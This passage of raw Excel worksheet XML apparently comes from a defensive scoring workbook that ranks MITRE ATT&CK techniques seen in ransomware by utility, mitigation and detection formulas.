      <c r="E4" s="39">
        <v>0.76666666666666661</v>
      </c>
      <c r="F4" t="str">
        <v>T1490</v>
      </c>
      <c r="G4" s="40" t="str">
        <v>Inhibit System Recovery</v>
      </c>
    </row>
    <row r="5" spans="1:7">
      <c r="A5" s="24">
        <v>2383.2333333333331</v>
      </c>
      <c r="B5" t="str">
        <v>T1543</v>
      </c>
      <c r="C5" s="25" t="str">
        <v>Create or Modify System Process</v>
      </c>
      <c r="E5" s="39">
        <v>0.6333333333333333</v>
      </c>
      <c r="F5" t="str">
        <v>T1027</v>
      </c>
      <c r="G5" s="40" t="str">
        <v>Obfuscated Files or Information</v>
      </c>
    </row>
    <row r="6" spans="1:7">
      <c r="A6" s="24">
        <v>2094.2142857142858</v>
      </c>
      <c r="B6" t="str">
        <v>T1557.003</v>
      </c>
      <c r="C6" s="25" t="str">
        <v>Adversary-in-the-Middle</v>
      </c>
      <c r="E6" s="39">
        <v>0.6333333333333333</v>
      </c>
      <c r="F6" t="str">
        <v>T1562.001</v>
      </c>
      <c r="G6" s="40" t="str">
        <v>Impair Defenses</v>
      </c>
    </row>
    <row r="7" spans="1:7">
      <c r="A7" s="24">
        <v>2091.2428571428572</v>
      </c>
      <c r="B7" t="str">
        <v>T1564.010</v>
      </c>
      <c r="C7" s="25" t="str">
        <v>Hide Artifacts</v>
      </c>
      <c r="E7" s="39">
        <v>0.6</v>
      </c>
      <c r="F7" t="str">
        <v>T1489</v>
      </c>
      <c r="G7" s="40" t="str">
        <v>Service Stop</v>
      </c>
    </row>
    <row r="8" spans="1:7">
      <c r="A8" s="24">
        <v>2070.4243338095239</v>
      </c>
      <c r="B8" t="str">
        <v>T1569</v>
      </c>
      <c r="C8" s="25" t="str">
        <v>System Services</v>
      </c>
      <c r="E8" s="39">
        <v>0.56666666666666665</v>
      </c>
      <c r="F8" t="str">
        <v>T1036</v>
      </c>
      <c r="G8" s="40" t="str">
        <v>Masquerading</v>
      </c>
    </row>
    <row r="9" spans="1:7">
      <c r="A9" s="24">
        <v>1995.6903751428572</v>
      </c>
      <c r="B9" t="str">
        <v>T1218</v>
      </c>
      <c r="C9" s="25" t="str">
        <v>Signed Binary Proxy Execution</v>
      </c>
      <c r="E9" s="39">
        <v>0.56666666666666665</v>
      </c>
      <c r="F9" t="str">
        <v>T1057</v>
      </c>
      <c r="G9" s="40" t="str">
        <v>Process Discovery</v>
      </c>
    </row>
    <row r="10" spans="1:7">
      <c r="A10" s="24">
        <v>1975.0523809523811</v>
      </c>
      <c r="B10" t="str">
        <v>T1559.003</v>
      </c>
      <c r="C10" s="25" t="str">
        <v>Inter-Process Communication</v>
      </c>
      <c r="E10" s="39">
        <v>0.56666666666666665</v>
      </c>
      <c r="F10" t="str">
        <v>T1059.001</v>
      </c>
      <c r="G10" s="40" t="str">
        <v>Command and Scripting Interpreter</v>
      </c>
    </row>
    <row r="11" spans="1:7">
      <c r="A11" s="24">
        <v>1955.6557074285713</v>
      </c>
      <c r="B11" t="str">
        <v>T1548</v>
      </c>
      <c r="C11" s="25" t="str">
        <v>Abuse Elevation Control Mechanism</v>
      </c>
      <c r="E11" s="39">
        <v>0.56666666666666665</v>
      </c>
      <c r="F11" t="str">
        <v>T1083</v>
      </c>
      <c r="G11" s="40" t="str">
        <v>File and Directory Discovery</v>
      </c>
    </row>
    <row r="12" spans="1:7">
      <c r="A12" s="26">
        <v>1647.3579854761906</v>
      </c>
      <c r="B12" s="27" t="str">
        <v>T1552</v>
      </c>
      <c r="C12" s="28" t="str">
        <v>Unsecured Credentials</v>
      </c>
      <c r="E12" s="41">
        <v>0.56666666666666665</v>
      </c>
      <c r="F12" s="42" t="str">
        <v>T1112</v>
      </c>
      <c r="G12" s="43" t="str">
        <v>Modify Registry</v>
      </c>
    </row>
    <row r="14" spans="1:7">
      <c r="C14" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="15" spans="1:7">
      <c r="A15" t="s">
        <v>6</v>
      </c>
      <c r="B15" t="s">
        <v>7</v>
      </c>
      <c r="C15">
        <f>IF(B15="N",0.2*0.99,IF(B15="L", 0.2 * 0.66,IF(B15="M",0.2*0.33,IF(B15="H",0))))</f>
        <v>0</v>
      </c>
    </row>
    <row r="16" spans="1:7">
      <c r="A16" t="s">
        <v>8</v>
      </c>
      <c r="B16" t="s">
        <v>7</v>
      </c>
      <c r="C16">
        <f t="shared" ref="C16:C19" si="0">IF(B16="N",0.2*0.99,IF(B16="L", 0.2 * 0.66,IF(B16="M",0.2*0.33,IF(B16="H",0))))</f>
        <v>0</v>
      </c>
    </row>
    <row r="17" spans="1:3">
      <c r="A17" t="s">
        <v>9</v>
      </c>
      <c r="B17" t="s">
        <v>10</v>
      </c>
      <c r="C17">
        <f t="shared" si="0"/>
        <v>0.19800000000000001</v>
      </c>
    </row>
    <row r="18" spans="1:3">
      <c r="A18" t="s">
        <v>11</v>
      </c>
      <c r="B18" t="s">
        <v>10</v>
      </c>
      <c r="C18">
        <f t="shared" si="0"/>
        <v>0.19800000000000001</v>
      </c>
    </row>
    <row r="19" spans="1:3">
      <c r="A19" t="s">
        <v>12</v>
      </c>
      <c r="B19" t="s">
        <v>7</v>
      </c>
      <c r="C19">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="21" spans="1:3">
      <c r="A21" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="23" spans="1:3">
      <c r="A23" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="25" spans="1:3">
      <c r="A25" t="s">
        <v>15</v>
      </c>
    </row>
    <row r="27" spans="1:3">
      <c r="A27" t="s">
        <v>16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CDFD9-4E39-0040-BA61-27A0B135497C}">
  <dimension ref="A1:AU641"/>
  <sheetViews>
    <sheetView topLeftCell="A500" zoomScale="85" zoomScaleNormal="140" workbookViewId="0">
      <selection activeCell="B642" sqref="B642:B999"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="11" defaultRowHeight="16"/>
  <cols>
    <col min="1" max="1" width="23.5" style="29" customWidth="1"/>
    <col min="2" max="2" width="23.1640625" style="32" customWidth="1"/>
    <col min="3" max="3" width="21.5" style="29" customWidth="1"/>
    <col min="4" max="4" width="26.5" style="51" customWidth="1"/>
    <col min="5" max="5" width="26.5" style="29" customWidth="1"/>
    <col min="6" max="6" width="15.6640625" style="29" customWidth="1"/>
    <col min="7" max="7" width="14" style="29" customWidth="1"/>
    <col min="8" max="8" width="12.6640625" style="29" customWidth="1"/>
    <col min="9" max="9" width="18.1640625" customWidth="1"/>
    <col min="10" max="10" width="14.33203125" customWidth="1"/>
    <col min="11" max="11" width="24.1640625" customWidth="1"/>
    <col min="12" max="12" width="22.5" customWidth="1"/>
    <col min="13" max="13" width="24.33203125" style="29" customWidth="1"/>
    <col min="14" max="14" width="11.33203125" style="55" customWidth="1"/>
    <col min="15" max="15" width="12.1640625" style="55" customWidth="1"/>
    <col min="16" max="16" width="14.33203125" style="55" customWidth="1"/>
    <col min="17" max="17" width="14.1640625" style="55" customWidth="1"/>
    <col min="18" max="18" width="26.5" style="30" customWidth="1"/>
    <col min="19" max="19" width="18.33203125" style="30" customWidth="1"/>
    <col min="20" max="20" width="34.1640625" style="30" customWidth="1"/>
    <col min="21" max="21" width="22.1640625" style="30" customWidth="1"/>
    <col min="22" max="22" width="17.1640625" style="32" customWidth="1"/>
    <col min="23" max="23" width="15.83203125" style="1" hidden="1" customWidth="1"/>
    <col min="24" max="24" width="26.5" style="1" hidden="1" customWidth="1"/>
    <col min="25" max="25" width="17.5" style="1" hidden="1" customWidth="1"/>
    <col min="26" max="26" width="15.1640625" style="1" hidden="1" customWidth="1"/>
    <col min="27" max="28" width="26.5" style="1" hidden="1" customWidth="1"/>
    <col min="29" max="29" width="16.5" style="1" customWidth="1"/>
    <col min="30" max="30" width="52.1640625" style="51" customWidth="1"/>
    <col min="31" max="31" width="18" style="32" customWidth="1"/>
    <col min="32" max="32" width="18.1640625" style="32" hidden="1" customWidth="1"/>
    <col min="33" max="33" width="18.33203125" style="29" customWidth="1"/>
    <col min="34" max="34" width="18.33203125" style="29" hidden="1" customWidth="1"/>
    <col min="35" max="35" width="14.6640625" style="29" customWidth="1"/>
    <col min="36" max="36" width="14.6640625" style="29" hidden="1" customWidth="1"/>
    <col min="37" max="37" width="16.1640625" style="29" customWidth="1"/>
    <col min="38" max="38" width="16.1640625" style="29" hidden="1" customWidth="1"/>
    <col min="39" max="39" width="14.6640625" style="29" customWidth="1"/>
    <col min="40" max="40" width="14.6640625" style="29" hidden="1" customWidth="1"/>
    <col min="41" max="41" width="37" style="29" customWidth="1"/>
    <col min="42" max="42" width="33.1640625" style="29" customWidth="1"/>
    <col min="43" max="43" width="20.83203125" style="29" customWidth="1"/>
    <col min="44" max="44" width="18.5" style="29" customWidth="1"/>
    <col min="45" max="45" width="24.1640625" style="29" customWidth="1"/>
    <col min="46" max="46" width="15.83203125" style="29" customWidth="1"/>
    <col min="47" max="47" width="37.83203125" style="29" customWidth="1"/>
    <col min="48" max="16384" width="11" style="29"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:47" ht="15" customHeight="1">
      <c r="B1" s="29"/>
      <c r="F1" s="59" t="s">
        <v>17</v>
      </c>
      <c r="G1" s="59"/>
      <c r="H1" s="59"/>
      <c r="I1" s="59"/>
      <c r="J1" s="59"/>
      <c r="K1" s="59"/>
      <c r="L1" s="59"/>
      <c r="M1" s="34" t="s">
        <v>18</v>
      </c>
      <c r="N1" s="62" t="s">
        <v>19</v>
      </c>
      <c r="O1" s="62"/>
      <c r="P1" s="62"/>
      <c r="Q1" s="62"/>
      <c r="R1" s="62"/>
      <c r="S1" s="62"/>
      <c r="T1" s="62"/>
      <c r="U1" s="62"/>
      <c r="V1" s="62"/>
      <c r="W1" s="20"/>
      <c r="X1" s="20"/>
      <c r="Y1" s="20"/>
      <c r="Z1" s="20"/>
      <c r="AA1" s="20"/>
      <c r="AB1" s="20"/>
      <c r="AC1" s="20"/>
      <c r="AD1" s="63" t="s">
        <v>20</v>
      </c>
      <c r="AE1" s="63"/>
      <c r="AF1" s="63"/>
      <c r="AG1" s="63"/>
      <c r="AH1" s="63"/>
      <c r="AI1" s="63"/>
      <c r="AJ1" s="63"/>
      <c r="AK1" s="63"/>
      <c r="AL1" s="63"/>
      <c r="AM1" s="63"/>
      <c r="AN1" s="36"/>
      <c r="AO1" s="58" t="s">
        <v>21</v>
      </c>
      <c r="AP1" s="58"/>
      <c r="AQ1" s="58"/>
      <c r="AR1" s="58"/>
      <c r="AS1" s="58"/>
      <c r="AT1" s="58"/>
      <c r="AU1" s="58"/>
    </row>
    <row r="2" spans="1:47">
      <c r="B2" s="29"/>
      <c r="F2" s="33"/>
      <c r="G2" s="33"/>
      <c r="H2" s="33"/>
      <c r="I2" s="33"/>
      <c r="J2" s="33"/>
      <c r="K2" s="33"/>
      <c r="L2" s="33"/>
      <c r="M2" s="34"/>
      <c r="N2" s="60" t="s">
        <v>16</v>
      </c>
      <c r="O2" s="60"/>
      <c r="P2" s="60"/>
      <c r="Q2" s="60"/>
      <c r="R2" s="61" t="s">
        <v>22</v>
      </c>
      <c r="S2" s="61"/>
      <c r="T2" s="61"/>
      <c r="U2" s="61"/>
      <c r="V2" s="35"/>
      <c r="W2" s="20"/>
      <c r="X2" s="20"/>
      <c r="Y2" s="20"/>
      <c r="Z2" s="20"/>
      <c r="AA2" s="20"/>
      <c r="AB2" s="20"/>
      <c r="AC2" s="20"/>
      <c r="AD2" s="54"/>
      <c r="AE2" s="36"/>
      <c r="AF2" s="36"/>
      <c r="AG2" s="36"/>
      <c r="AH2" s="36"/>
      <c r="AI2" s="36"/>
      <c r="AJ2" s="36"/>
      <c r="AK2" s="36"/>
      <c r="AL2" s="36"/>
      <c r="AM2" s="36"/>
      <c r="AN2" s="36"/>
      <c r="AO2" s="13"/>
    </row>
    <row r="3" spans="1:47" ht="17">
      <c r="A3" s="29" t="s">
        <v>23</v>
      </c>
      <c r="B3" s="29" t="s">
        <v>24</v>
      </c>
      <c r="C3" s="29" t="s">
        <v>25</v>
      </c>
      <c r="D3" s="51" t="s">
        <v>26</v>
      </c>
      <c r="E3" s="47" t="s">
        <v>27</v>
      </c>
      <c r="F3" s="29" t="s">
        <v>28</v>
      </c>
      <c r="G3" s="29" t="s">
        <v>29</v>
      </c>
      <c r="H3" s="29" t="s">
        <v>30</v>
      </c>
      <c r="I3" t="s">
        <v>31</v>
      </c>
      <c r="J3" t="s">
        <v>32</v>
      </c>
      <c r="K3" t="s">
        <v>33</v>
      </c>
      <c r="L3" t="s">
        <v>34</v>
      </c>
      <c r="M3" s="29" t="s">
        <v>35</v>
      </c>
      <c r="N3" s="55" t="s">
        <v>36</v>
      </c>
      <c r="O3" s="55" t="s">
        <v>37</v>
      </c>
      <c r="P3" s="55" t="s">
        <v>38</v>
      </c>
      <c r="Q3" s="55" t="s">
        <v>39</v>
      </c>
      <c r="R3" s="30" t="s">
        <v>40</v>
      </c>
      <c r="S3" s="30" t="s">
        <v>41</v>
      </c>
      <c r="T3" s="30" t="s">
        <v>42</v>
      </c>
      <c r="U3" s="30" t="s">
        <v>43</v>
      </c>
      <c r="V3" s="29" t="s">
        <v>44</v>
      </c>
      <c r="W3" t="s">
        <v>45</v>
      </c>
      <c r="X3" t="s">
        <v>46</v>
      </c>
      <c r="Y3" t="s">
        <v>47</v>
      </c>
      <c r="Z3" t="s">
        <v>48</v>
      </c>
      <c r="AA3" t="s">
        <v>49</v>
      </c>
      <c r="AB3" t="s">
        <v>50</v>
      </c>
      <c r="AC3" t="s">
        <v>51</v>
      </c>
      <c r="AD3" s="31" t="s">
        <v>52</v>
      </c>
      <c r="AE3" s="29" t="s">
        <v>53</v>
      </c>
      <c r="AF3" s="29" t="s">
        <v>54</v>
      </c>
      <c r="AG3" s="29" t="s">
        <v>55</v>
      </c>
      <c r="AH3" s="29" t="s">
        <v>56</v>
      </c>
      <c r="AI3" s="29" t="s">
        <v>57</v>
      </c>
      <c r="AJ3" s="29" t="s">
        <v>58</v>
      </c>
      <c r="AK3" s="29" t="s">
        <v>59</v>
      </c>
      <c r="AL3" s="29" t="s">
        <v>60</v>
      </c>
      <c r="AM3" s="29" t="s">
        <v>61</v>
      </c>
      <c r="AN3" s="29" t="s">
        <v>62</v>
      </c>
      <c r="AO3" s="48" t="s">
        <v>63</v>
      </c>
      <c r="AP3" s="29" t="s">
        <v>64</v>
      </c>
      <c r="AQ3" s="29" t="s">
        <v>65</v>
      </c>
      <c r="AR3" s="29" t="s">
        <v>66</v>
      </c>
      <c r="AS3" s="29" t="s">
        <v>67</v>
      </c>
      <c r="AT3" s="29" t="s">
        <v>68</v>
      </c>
      <c r="AU3" s="29" t="s">
        <v>69</v>
      </c>
    </row>
    <row r="4" spans="1:47" ht="17">
      <c r="A4" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.19639577619047621</v>
      </c>
      <c r="B4" s="37">
        <f>SUM(H4,M4,V4)*(1+SUM(AF4,AH4,AJ4,AL4,AN4))</f>
        <v>0.29729109523809527</v>
      </c>
      <c r="C4" s="37" t="s">
        <v>70</v>
      </c>
      <c r="D4" s="50" t="s">
        <v>71</v>
      </c>
      <c r="E4" s="37"/>
      <c r="F4" s="37">
        <v>2</v>
      </c>
      <c r="G4" s="37">
        <v>2</v>
      </c>
      <c r="H4" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.2</v>
      </c>
      <c r="I4" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.2</v>
      </c>
      <c r="J4" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="K4" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.2</v>
      </c>
      <c r="L4" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="M4" s="37">
        <v>1.1577E-2</v>
      </c>
      <c r="N4" s="56">
        <v>0</v>
      </c>
      <c r="O4" s="56">
        <v>0</v>
      </c>
      <c r="P4" s="56">
        <v>0</v>
      </c>
      <c r="Q4" s="56">
        <v>0</v>
      </c>
      <c r="R4" s="57" t="s">
        <v>73</v>
      </c>
      <c r="S4" s="57">
        <v>2</v>
      </c>
      <c r="T4" s="57" t="s">
        <v>74</v>
      </c>
      <c r="U4" s="57">
        <v>7</v>
      </c>
      <c r="V4" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>8.5714095238095242E-2</v>
      </c>
      <c r="W4" s="37">
        <v>9</v>
      </c>
      <c r="X4" s="37">
        <v>0.163636</v>
      </c>
      <c r="Y4" s="37">
        <v>0.163636</v>
      </c>
      <c r="Z4" s="37">
        <v>0</v>
      </c>
      <c r="AA4" s="37">
        <v>0</v>
      </c>
      <c r="AB4" s="37">
        <v>0</v>
      </c>
      <c r="AC4" s="37"/>
      <c r="AD4" s="50" t="s">
        <v>75</v>
      </c>
      <c r="AE4" s="37" t="str" cm="1">
        <f t="array" ref="AE4">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD4)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF4" s="37">
        <v>0</v>
      </c>
      <c r="AG4" s="37" t="str" cm="1">
        <f t="array" ref="AG4">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD4)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH4" s="37">
        <v>0</v>
      </c>
      <c r="AI4" s="37" t="str" cm="1">
        <f t="array" ref="AI4">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD4)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ4" s="37">
        <v>0</v>
      </c>
      <c r="AK4" s="37" t="str" cm="1">
        <f t="array" ref="AK4">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD4)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL4" s="37">
        <v>0</v>
      </c>
      <c r="AM4" s="37" t="str" cm="1">
        <f t="array" ref="AM4">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD4)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN4" s="37">
        <v>0</v>
      </c>
      <c r="AO4" s="37">
        <v>5</v>
      </c>
      <c r="AP4" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.19639577619047621</v>
      </c>
      <c r="AQ4" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>9.9097031746031752E-2</v>
      </c>
      <c r="AR4" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>9.9097031746031752E-2</v>
      </c>
      <c r="AS4" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.23809523809523808</v>
      </c>
      <c r="AT4" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.23809523809523808</v>
      </c>
      <c r="AU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0.13084488473167044</v>
      </c>
    </row>
    <row r="5" spans="1:47" ht="17">
      <c r="A5" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.12619038095238094</v>
      </c>
      <c r="B5" s="37">
        <f t="shared" ref="B5:B68" si="0">SUM(H5,M5,V5)*(1+SUM(AF5,AH5,AJ5,AL5,AN5))</f>
        <v>0.92857047619047617</v>
      </c>
      <c r="C5" s="37" t="s">
        <v>76</v>
      </c>
      <c r="D5" s="50" t="s">
        <v>71</v>
      </c>
      <c r="E5" s="37" t="s">
        <v>77</v>
      </c>
      <c r="F5" s="37">
        <v>1</v>
      </c>
      <c r="G5" s="37">
        <v>1</v>
      </c>
      <c r="H5" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I5" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J5" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K5" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L5" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M5" s="37">
        <v>0</v>
      </c>
      <c r="N5" s="56">
        <v>0</v>
      </c>
      <c r="O5" s="56">
        <v>0</v>
      </c>
      <c r="P5" s="56">
        <v>0</v>
      </c>
      <c r="Q5" s="56">
        <v>0</v>
      </c>
      <c r="R5" s="57" t="s">
        <v>73</v>
      </c>
      <c r="S5" s="57">
        <v>2</v>
      </c>
      <c r="T5" s="57" t="s">
        <v>74</v>
      </c>
      <c r="U5" s="57">
        <v>7</v>
      </c>
      <c r="V5" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>8.5714095238095242E-2</v>
      </c>
      <c r="W5" s="37">
        <v>9</v>
      </c>
      <c r="X5" s="37">
        <v>0.163636</v>
      </c>
      <c r="Y5" s="37">
        <v>0.163636</v>
      </c>
      <c r="Z5" s="37">
        <v>0</v>
      </c>
      <c r="AA5" s="37">
        <v>0</v>
      </c>
      <c r="AB5" s="37">
        <v>0</v>
      </c>
      <c r="AC5" s="37"/>
      <c r="AD5" s="50" t="s">
        <v>75</v>
      </c>
      <c r="AE5" s="37" t="str" cm="1">
        <f t="array" ref="AE5">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD5)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF5" s="37">
        <v>1</v>
      </c>
      <c r="AG5" s="37" t="str" cm="1">
        <f t="array" ref="AG5">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD5)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH5" s="37">
        <v>1</v>
      </c>
      <c r="AI5" s="37" t="str" cm="1">
        <f t="array" ref="AI5">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD5)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ5" s="37">
        <v>1</v>
      </c>
      <c r="AK5" s="37" t="str" cm="1">
        <f t="array" ref="AK5">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD5)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL5" s="37">
        <v>1</v>
      </c>
      <c r="AM5" s="37" t="str" cm="1">
        <f t="array" ref="AM5">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD5)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN5" s="37">
        <v>0</v>
      </c>
      <c r="AO5" s="37">
        <v>1</v>
      </c>
      <c r="AP5" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.12619038095238094</v>
      </c>
      <c r="AQ5" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.30952349206349206</v>
      </c>
      <c r="AR5" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.30952349206349206</v>
      </c>
      <c r="AS5" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT5" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU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3.1179130763416475E-2</v>
      </c>
    </row>
    <row r="6" spans="1:47" ht="17">
      <c r="A6" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.1671426857142857</v>
      </c>
      <c r="B6" s="37">
        <f t="shared" si="0"/>
        <v>1.671426857142857</v>
      </c>
      <c r="C6" s="37" t="s">
        <v>78</v>
      </c>
      <c r="D6" s="50" t="s">
        <v>71</v>
      </c>
      <c r="E6" s="37" t="s">
        <v>79</v>
      </c>
      <c r="F6" s="37">
        <v>1</v>
      </c>
      <c r="G6" s="37">
        <v>1</v>
      </c>
      <c r="H6" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I6" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J6" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K6" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L6" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M6" s="37">
        <v>0</v>
      </c>
      <c r="N6" s="56">
        <v>0</v>
      </c>
      <c r="O6" s="56">
        <v>0</v>
      </c>
      <c r="P6" s="56">
        <v>0</v>
      </c>
      <c r="Q6" s="56">
        <v>0</v>
      </c>
      <c r="R6" s="57" t="s">
        <v>73</v>
      </c>
      <c r="S6" s="57">
        <v>2</v>
      </c>
      <c r="T6" s="57" t="s">
        <v>74</v>
      </c>
      <c r="U6" s="57">
        <v>7</v>
      </c>
      <c r="V6" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>8.5714095238095242E-2</v>
      </c>
      <c r="W6" s="37">
        <v>9</v>
      </c>
      <c r="X6" s="37">
        <v>0.163636</v>
      </c>
      <c r="Y6" s="37">
        <v>0.163636</v>
      </c>
      <c r="Z6" s="37">
        <v>0</v>
      </c>
      <c r="AA6" s="37">
        <v>0</v>
      </c>
      <c r="AB6" s="37">
        <v>0</v>
      </c>
      <c r="AC6" s="37"/>
      <c r="AD6" s="50" t="s">
        <v>75</v>
      </c>
      <c r="AE6" s="37" t="str" cm="1">
        <f t="array" ref="AE6">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD6)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF6" s="37">
        <v>2</v>
      </c>
